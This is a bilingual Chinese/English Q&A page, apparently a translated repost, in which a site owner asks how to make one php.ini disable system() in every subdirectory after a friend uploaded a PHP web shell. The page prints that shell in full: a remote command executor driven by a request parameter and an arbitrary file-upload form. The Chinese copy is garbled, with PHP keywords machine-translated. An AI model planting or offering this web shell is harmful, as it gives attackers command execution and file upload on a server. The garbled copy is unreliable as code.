如何让我的 php.ini 文件影响我服务器的所有目录/子目录? [英] How do I enable my php.ini file to affect all directories/sub-directories of my server?

问题描述

几周前，我在共享服务器上打开了一个漏洞，我的朋友上传了以下 PHP 脚本:

";$cmd = ($_REQUEST['cmd']);系统($cmd)；echo "</pre>";死;}?><?phpif(isset($_REQUEST['上传'])){echo '
<input type="hidden" name="MAX_FILE_SIZE" value="5120000"/>发送这个文件:<input name="userfile" type="file"/>到这里:<input type="text" name="direct" value="/home/chriskan/public_html/_phx2600/wp-content/???"/><input type="submit" value="发送文件"/>
';}?><?phpif(isset($_REQUEST['send'])) {$uploaddir = $_POST["direct"];$uploadfile = $uploaddir .basename($_FILES['userfile']['name']);如果 (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {echo "文件有效，上传成功.\n";回声 $uploaddir;} 别的 {echo "上传失败";}}?>
此脚本允许他通过 URL 内变量处理命令.
我在 public_html 目录的 php.ini 文件中禁用了系统和其他功能.如果脚本位于我的 public_html 目录中，这将阻止脚本运行，但如果它位于该目录的子目录中，则不会停止运行.如果我将 php.ini 文件复制到子目录中，它将阻止它从该目录运行.
我的问题是，如何让我的 php.ini 文件影响我服务器的所有目录/子目录?
解决方案
谢谢各位，你们的回答很棒，但一直都在我眼皮底下.通过 cPanel，我能够编辑我的服务器以使用单个 php.ini 文件.
A few weeks ago I opened up a hole on my shared server and my friend uploaded the following PHP script:
<?php
if(isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>

<?php
if(isset($_REQUEST['upload'])) {
    echo '<form enctype="multipart/form-data" action=".config.php?send" method="POST">
        <input type="hidden" name="MAX_FILE_SIZE" value="5120000" />
        Send this file: <input name="userfile" type="file" />
        To here: <input type="text" name="direct" value="/home/chriskan/public_html/_phx2600/wp-content/???" />
        <input type="submit" value="Send File" />
    </form>';
}
?>

<?php
if(isset($_REQUEST['send'])) {
    $uploaddir = $_POST["direct"];
    $uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

    if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
        echo "File is valid, and was successfully uploaded.\n"; echo $uploaddir;
    } else {
        echo "Upload failed";
    }
}
?>
This script allows him to process commands through in-URL variables.

I have disabled system, among other functions, in the php.ini file in my public_html directory.  This will prevent the script from running if it's located within my public_html directory, but doesn't stop it if it's in a sub-directory of that.  If I copy the php.ini file into a sub-directory it will stop it from running from that directory.

My question is, how do I enable my php.ini file to affect all directories/sub-directories of my server?
解决方案
Thanks guys, your answers were great, but the answer was right under my nose the entire time.  Via cPanel I was able to edit my server to use a single php.ini file.

                        
这篇关于如何让我的 php.ini 文件影响我服务器的所有目录/子目录?的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！